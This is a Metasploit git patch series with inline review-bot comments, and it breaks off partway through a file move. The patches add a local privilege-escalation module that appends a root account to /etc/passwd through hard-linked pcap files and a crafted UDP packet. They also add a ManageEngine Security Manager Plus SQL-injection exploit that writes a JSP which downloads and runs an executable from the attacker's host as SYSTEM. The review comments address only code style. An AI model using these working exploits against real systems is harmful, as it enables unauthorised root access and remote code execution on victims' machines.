From d148acdce3c4a0968622933ecd6e25feec8c20f2 Mon Sep 17 00:00:00 2001
From: 0a2940 <0a2940@gmail.com>
Date: Sat, 21 Jul 2012 12:18:43 +0100
Subject: [PATCH 01/74] added exploit for metasploit pcap_log prov-esc
---
 .../post/multi/escalate/metasploit_pcaplog.rb | 102 ++++++++++++++++++
 1 file changed, 102 insertions(+)
 create mode 100644 modules/post/multi/escalate/metasploit_pcaplog.rb
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
new file mode 100644
index 0000000000..92537dd465
--- /dev/null
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
@@ -0,0 +1,102 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/local/linux_kernel'
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/local/unix'
+
+load 'lib/msf/core/post/common.rb'
+load 'lib/msf/core/post/file.rb'
+load 'lib/msf/core/exploit/local/unix.rb'
+load 'lib/msf/core/exploit/local/linux.rb'
+
+class Metasploit3 < Msf::Post
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Common
+
+ include Msf::Exploit::Local::Linux
+ include Msf::Exploit::Local::Unix
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'Metasploit pcap_log Local Privilege Escalation',
+ 'Description' => %q{
+ Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
+ creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
+ filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within.
+ This, and all the other packets, are appended to /etc/passwd.
+
+ Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'.
+
+ This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
+ 'Platform' => [ 'linux','unix','bsd' ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'References' =>
+ [
+ [ 'BID', '54472' ],
+ [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
+ [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
+ ],
+ 'DisclosureDate' => "Jul 16 2012",
+ 'Targets' =>
+ [
+ [ 'Linux/Unix Universal', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ }
+ ))
+ register_options(
+ [
+ Opt::RPORT(2940)
+ ], self)
+ end
+
+ def run
+ print_status "Waiting for victim"
+ initial_size = cmd_exec("cat /etc/passwd | wc -l")
+ i = 60
+ while(true) do
+ if (i == 60) then
+ # 0a2940: cmd_exec is slow, so send 1 command to do all the links
+ cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
+ i = 0
+ end
+ i = i+1
+ if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then
+ # PCAP is flowing
+ pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
+ print_status("Sending file contents payload to #{session.session_host}")
+ udpsock = Rex::Socket::Udp.create(
+ {
+ 'Context' => {'Msf' => framework, 'MsfExploit'=>self}
+ })
+ udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
+ break
+ end
+ sleep(1)
+ end
+
+ if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
+ then
+ print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.")
+ else
+ print_error("Failed. You should manually verify the 'metasploit' user has not been added")
+ end
+ # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
+ # However beceause the session is not a terminal, su will not always allow this.
+ end
+end
From 176f6ea41e66e036ef05a137442d076c49fa45c1 Mon Sep 17 00:00:00 2001
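Review bot: The UDP socket opened in `run` (`udpsock = Rex::Socket::Udp.create(...)`) is never closed after `udpsock.sendto(...)`; add `udpsock.close` after the send, or open it in a `begin ... ensure udpsock.close end` block, so the descriptor is released when the loop breaks. The four `load 'lib/msf/core/...'` lines re-execute library files the preceding `require`s already loaded, and their repository-relative paths only resolve when the process is started from the framework root, so they look like leftover development scaffolding that should not be merged. `cmd_exec("cat /etc/passwd | wc -l")` is compared with `!=` once a second as a raw string, so any difference in trailing whitespace between two runs reads as a change; `wc -l < /etc/passwd` removes the useless `cat` and `.strip` on both values makes the comparison robust. The `while(true) do` loop has no upper bound, so the operator has no way to give up if no pcap is ever written; a timeout option would make that explicit.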
From: 0a2940 <0a2940@gmail.com> Date: Sun, 5 Aug 2012 18:20:44 +0200 Subject: [PATCH 02/74] added USERNAME and PASSWORD as options --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 92537dd465..268d18a472 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Post filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. This, and all the other packets, are appended to /etc/passwd. - Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'. + Successful exploitation results in the creation of a new superuser account. This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. }, @@ -60,8 +60,10 @@ class Metasploit3 < Msf::Post } )) register_options( - [ - Opt::RPORT(2940) + [ + Opt::RPORT(2940), + OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) ], self) end @@ -78,7 +80,7 @@ class Metasploit3 < Msf::Post i = i+1 if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then # PCAP is flowing - pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" + pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { 
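Review bot: `datastore['PASSWORD'].crypt("0a")` in the `@@ -78,7` hunk passes a constant two-character salt, which selects the legacy DES crypt scheme: only the first eight characters of PASSWORD are significant and identical passwords always yield the same hash, so the PASSWORD option description should state the truncation or the salt should be generated per run. USERNAME and PASSWORD are concatenated straight into the passwd record; a `:` or newline in either option corrupts the line, so a `raise ArgumentError, "USERNAME must not contain ':' or newlines"` style check before `pkt` is built fails early with a clear message instead of producing a malformed entry. The `@@ -60,8` hunk is whitespace only, and the `@@ -99,4` hunk below drops the file's trailing newline ("\ No newline at end of file"), which should be kept. The enclosing `run` method starts and ends outside the `@@ -78,7` hunk.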
@@ -99,4 +101,4 @@ class Metasploit3 < Msf::Post # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end +end \ No newline at end of file From f5b3886e8cff7ac30754da73dfaeac3d9749ab54 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Mon, 6 Aug 2012 10:41:55 +0200 Subject: [PATCH 03/74] fix success/fail print statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 268d18a472..c4a22596e3 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") then - print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.") + print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else - print_error("Failed. You should manually verify the 'metasploit' user has not been added") + print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. From f728d32f60e59e7df2fbc5b2586bf8ffda7ab136 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:14:45 +0200 Subject: [PATCH 04/74] code style improvement - remove 'then' from 'if's --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) 
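Review bot: The success test above the changed lines still runs `grep Metasploit /etc/passwd`, which matches the fixed GECOS text "Metasploit Root Account" rather than the account the new message names, so the message can report a USERNAME that the check never looked for. Anchoring the test on the configured name, `grep \"^#{datastore['USERNAME']}:\" /etc/passwd`, keeps the check and the message in agreement. Both new print calls build their text with `+`; interpolation is the idiomatic form, e.g. `print_error("Failed. You should manually verify the '#{datastore['USERNAME']}' user has not been added")`. The enclosing `run` method starts outside the hunk.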
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index c4a22596e3..87afaf301c 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Post initial_size = cmd_exec("cat /etc/passwd | wc -l") i = 60 while(true) do - if (i == 60) then + if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 - if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then + if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Post end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") - then print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") From f48f77c0d7a53ea032460fec147559c0417d84c5 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:19:00 +0200 Subject: [PATCH 05/74] compatibility improvement - backticks not $() For the comments above, and the fact we're using backticks later in the line also (uniformity++) --- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 87afaf301c..0c2bd28476 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb 
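Review bot: Dropping `then` leaves the parentheses around the conditions (`if (i == 60)`, `if (cmd_exec(...) != initial_size)`), which are just as non-idiomatic in Ruby; `if i == 60` and `if cmd_exec("cat /etc/passwd | wc -l") != initial_size` complete the cleanup this commit starts. The `while(true) do` context line at the top of the `@@ -72,13` hunk is the same pattern, and `loop do` is the Ruby form. The `@@ -93,7` hunk removes a `then` that stood on its own line after the `if cmd_exec(...)` condition, which is the right fix; the enclosing `run` method starts and ends outside both hunks.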
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post while(true) do if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links - cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") + cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 From 733f656b004b487edc748c261a8e80483000f18f Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:32:10 +0200 Subject: [PATCH 06/74] code style improvement - start counter at 0 --- modules/post/multi/escalate/metasploit_pcaplog.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 0c2bd28476..8853855a68 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -70,14 +70,12 @@ class Metasploit3 < Msf::Post def run print_status "Waiting for victim" initial_size = cmd_exec("cat /etc/passwd | wc -l") - i = 60 + i = 0 while(true) do - if (i == 60) + if (i == 0) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") - i = 0 end - i = i+1 if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" 
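Review bot: Replacing `$(seq 0 120)` with backticks does not make the command portable, because `date --date=\"\$i seconds\"` on the same line is a GNU coreutils option, while the module's 'Platform' metadata (outside this hunk) lists 'unix' and 'bsd', where that flag does not exist and `seq` may be absent as well. Either narrow 'Platform' to the environments the command actually runs on or state the GNU coreutils dependency in the module description, so the metadata matches what the code requires. The enclosing `run` method starts and ends outside the hunk.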
@@ -89,7 +87,8 @@ class Metasploit3 < Msf::Post udpsock.sendto(pkt, session.session_host, datastore['RPORT']) break end - sleep(1) + sleep(1) # wait a second + i = (i+1) % 60 # increment second counter end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") From cbce2c0fd57b58f2861666585acc36249c46d0d4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 17 Oct 2012 17:30:30 -0500 Subject: [PATCH 07/74] Loop management, timeouts, and verbosity Add a todo for cred recording. Allow the user to determine when to give up. Changes while true to simply loop. Clear up some of the boolean checks. Inform the user what's going on. --- .../post/multi/escalate/metasploit_pcaplog.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8853855a68..52feb3c0b1 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -20,7 +20,7 @@ load 'lib/msf/core/exploit/local/unix.rb' load 'lib/msf/core/exploit/local/linux.rb' class Metasploit3 < Msf::Post - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Post::File include Msf::Post::Common 
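Review bot: The new comments `# wait a second` and `# increment second counter` restate what `sleep(1)` and `i = (i+1) % 60` already say; a why-comment earns its place here, e.g. `# re-link every 60 s: the 121 timestamps created by seq 0 120 cover about two minutes`, because the 60 modulus and the `seq 0 120` range in the `@@ -70,14` hunk are coupled and neither names the other. Naming both values (`LINK_WINDOW = 120`, `RELINK_EVERY = 60`) would make that coupling explicit instead of leaving two magic numbers that must drift together. The enclosing loop and `run` method start outside this hunk.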
@@ -63,28 +63,40 @@ class Metasploit3 < Msf::Post [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), - OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), + OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5]) ], self) end + def normalize_minutes + datastore["MINUTES"].abs rescue 0 + end + def run - print_status "Waiting for victim" + print_status "Setting up the victim's /tmp dir" initial_size = cmd_exec("cat /etc/passwd | wc -l") + print_status "/etc/passwd is currently #{initial_size} lines long" i = 0 - while(true) do + j = 0 + loop do if (i == 0) + j += 1 + break if j >= datastore['MINUTES'] + 1 # Give up after X minutes # 0a2940: cmd_exec is slow, so send 1 command to do all the links + print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})" cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") end - if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) + current_size = cmd_exec("cat /etc/passwd | wc -l") + if current_size == initial_size # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" - print_status("Sending file contents payload to #{session.session_host}") + vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { 'Context' => {'Msf' => framework, 'MsfExploit'=>self} }) - udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + res = udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + else break end sleep(1) # wait a second 
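Review bot: `normalize_minutes` is added but never called — the loop tests `datastore['MINUTES'] + 1` directly — and its `rescue 0` modifier silently hides every error, so either use it on the `break if j >= ...` line or drop it. The inverted condition now creates a new `Rex::Socket::Udp` on every iteration in which `/etc/passwd` is unchanged and never closes any of them, leaking one socket per second for up to MINUTES minutes; create the socket once before `loop do` and close it in an `ensure`, or close it right after `sendto`. The `# PCAP is flowing` context comment now sits on the branch taken when the size has not changed, and the new `res = udpsock.sendto(...)` value is never read, so the comment belongs on the `else`/`break` branch and `res =` should go. The `run` method ends outside this hunk.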
@@ -93,10 +105,11 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") + # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end \ No newline at end of file +end From 2484bb02cf93aa06bc75fff9198e495bbb27f4fb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 22 Oct 2012 22:41:30 -0500 Subject: [PATCH 08/74] Add the initial version of the module From EDB. --- .../exploits/multi/http/manage_engine_sqli.rb | 218 ++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 modules/exploits/multi/http/manage_engine_sqli.rb diff --git a/modules/exploits/multi/http/manage_engine_sqli.rb b/modules/exploits/multi/http/manage_engine_sqli.rb new file mode 100644 index 0000000000..31eb68e69e --- /dev/null +++ b/modules/exploits/multi/http/manage_engine_sqli.rb 
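Review bot: The rewritten `print_error("Failed, the '" + datastore['USERNAME'] + "' user ...")` keeps string concatenation where interpolation is the idiomatic form: `print_error("Failed, the '#{datastore['USERNAME']}' user does not appear to have been added")`, and the `print_good` context line above it has the same shape. The new TODO about recording the credential is a reasonable marker, but a TODO inside a success branch is easy to lose; giving it an owner or ticket reference in the comment text keeps it actionable. The enclosing `run` method starts outside this hunk.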
@@ -0,0 +1,218 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Security Manager Plus <=5.5 build 5505 remote code execution", + 'Description' => %q{ + This module exploits a SQL injection found in ManageEngine Security Manager Plus + advanced search page. It will send a malicious SQL query to create a JSP file + under the web root directory, and then let it download and execute our malicious + executable under the context of SYSTEM. No authentication is necessary to exploit this. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence' # Discovery & Metasploit module + ], + 'References' => + [ + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'win', + 'Targets' => + [ + # Win XP / 2003 / Vista / Win 7 / etc + ['Windows Universal', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 18 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]), + ], self.class) + end + + + # + # A very gentle check to see if Security Manager Plus exists or not + # + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/SecurityManager.cc' + }) + + if res and res.body =~ /\Security Manager Plus\<\/title\>/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + # + # Remove the JSP once we get a shell. + # We cannot delete the executable because it will still be in use. 
+ # + def on_new_session(cli) + if cli.type != 'meterpreter' + print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") + return + end + + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + + begin + # jsp = @outpath.gsub(/\//, "\\\\") + # jsp = jsp.gsub(/"/, "") + vprint_status("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") + cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") + print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + rescue ::Exception => e + print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") + end + end + + + # + # Transfer the malicious executable to our victim + # + def on_client_connect(cli) + print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") + cli.put(@native_payload) + service.close_client(cli) + end + + + # + # Generate a download+exe JSP payload + # + def generate_jsp_payload + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] + my_port = datastore['SRVPORT'] + + # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\ + # This will download our malicious executable in base64 format, decode it back, + # save it as a temp file, and then finally execute it. 
+ jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="java.net.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + + <% + StringBuffer buf = new StringBuffer(); + byte[] shellcode = null; + BufferedOutputStream outstream = null; + try { + Socket s = new Socket("#{my_host}", #{my_port}); + BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); + while (buf.length() < #{@native_payload.length}) { + buf.append( (char) r.read()); + } + + BASE64Decoder decoder = new BASE64Decoder(); + shellcode = decoder.decodeBuffer(buf.toString()); + + File temp = File.createTempFile("#{@native_payload_name}", ".exe"); + String path = temp.getAbsolutePath(); + + outstream = new BufferedOutputStream(new FileOutputStream(path)); + outstream.write(shellcode); + outstream.close(); + + Process p = Runtime.getRuntime().exec(path); + } catch (Exception e) {} + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + + jsp.unpack("H*")[0] + end + + + # + # Run the actual exploit + # + def inject_exec + # This little lag is meant to ensure the TCP server runs first before the requests + select(nil, nil, nil, 1) + + # Inject our JSP payload + print_status("#{rhost}:#{rport} - Sending JSP payload") + pass = rand_text_alpha(rand(10)+5) + hex_jsp = generate_jsp_payload + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', + 'headers' => { + 'Cookie' => 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 
2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;', + 'Accept-Encoding' => 'identity' + }, + 'vars_post' => { + 'ANDOR' => 'and', + 'condition_1' => 'OpenPorts@PORT', + 'operator_1' => 'IN', + 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'COUNT' => '1' + } + }) + + print_status("#{rhost}:#{rport} - Sending pwnage /#{@jsp_name + '.jsp'}") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{@jsp_name + '.jsp'}", + 'headers' => { + 'Cookie' => 'pwnage' + } + }) + + handler + end + + + # + # The server must start first, and then we send the malicious requests + # + def exploit + # Avoid passing this as an argument for performance reasons + # This is in base64 is make sure our file isn't mangled + @native_payload = [generate_payload_exe].pack("m*") + @native_payload_name = rand_text_alpha(rand(6)+3) + @jsp_name = rand_text_alpha(rand(6)+3) + @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + + begin + t = framework.threads.spawn("reqs", false) { inject_exec } + print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") + super + ensure + t.kill + end + end +end \ No newline at end of file From 5072156df6a965e87e8ac1fc9a93759bb4144ccb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 22 Oct 2012 23:01:58 -0500 Subject: [PATCH 09/74] Designed specifically for Windows, so let's move to Windows Plus additional fixes --- .../exploits/multi/http/manage_engine_sqli.rb | 218 ------------------ .../windows/http/manage_engine_sqli.rb | 208 +++++++++++++++++ 2 files changed, 208 insertions(+), 218 deletions(-) delete mode 100644 modules/exploits/multi/http/manage_engine_sqli.rb create mode 100644 modules/exploits/windows/http/manage_engine_sqli.rb 
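Review bot: `on_new_session` rescues `::Exception`, which also swallows `Interrupt` and `SystemExit`; `rescue ::StandardError => e` (or a bare `rescue => e`) is the right scope for a failed file delete. In `check`, the pattern `/\Security Manager Plus\<\/title\>/` begins with `\S`, which Ruby reads as the non-whitespace class rather than a literal `S` — it only matches because `\S` happens to match that letter — and the guard `if res and res.body =~ ...` uses `and` where `&&` is meant; `if res && res.body =~ %r{Security Manager Plus</title>}` states the intent. `inject_exec` assigns `pass` and `res` without reading them, the comment `# tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\` describes a different product, and the `'References'` array is empty. In `exploit`, `ensure t.kill` raises `NoMethodError` when `framework.threads.spawn` itself fails because `t` is still nil; `t.kill if t` covers that path.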
diff --git a/modules/exploits/multi/http/manage_engine_sqli.rb b/modules/exploits/multi/http/manage_engine_sqli.rb deleted file mode 100644 index 31eb68e69e..0000000000 --- a/modules/exploits/multi/http/manage_engine_sqli.rb +++ /dev/null 
@@ -1,218 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::TcpServer - include Msf::Exploit::EXE - - def initialize(info={}) - super(update_info(info, - 'Name' => "ManageEngine Security Manager Plus <=5.5 build 5505 remote code execution", - 'Description' => %q{ - This module exploits a SQL injection found in ManageEngine Security Manager Plus - advanced search page. It will send a malicious SQL query to create a JSP file - under the web root directory, and then let it download and execute our malicious - executable under the context of SYSTEM. No authentication is necessary to exploit this. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'xistence' # Discovery & Metasploit module - ], - 'References' => - [ - ], - 'Payload' => - { - 'BadChars' => "\x00", - }, - 'DefaultOptions' => - { - 'ExitFunction' => "none" - }, - 'Platform' => 'win', - 'Targets' => - [ - # Win XP / 2003 / Vista / Win 7 / etc - ['Windows Universal', {}] - ], - 'Privileged' => false, - 'DisclosureDate' => "Oct 18 2012", - 'DefaultTarget' => 0)) - - register_options( - [ - OptPort.new('RPORT', [true, 'The target port', 6262]), - ], self.class) - end - - - # - # A very gentle check to see if Security Manager Plus exists or not - # - def check - res = send_request_raw({ - 'method' => 'GET', - 'uri' => '/SecurityManager.cc' - }) - - if res and res.body =~ /\Security Manager Plus\<\/title\>/ - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe - end - end - - - # - # Remove the JSP once we get a shell. - # We cannot delete the executable because it will still be in use. 
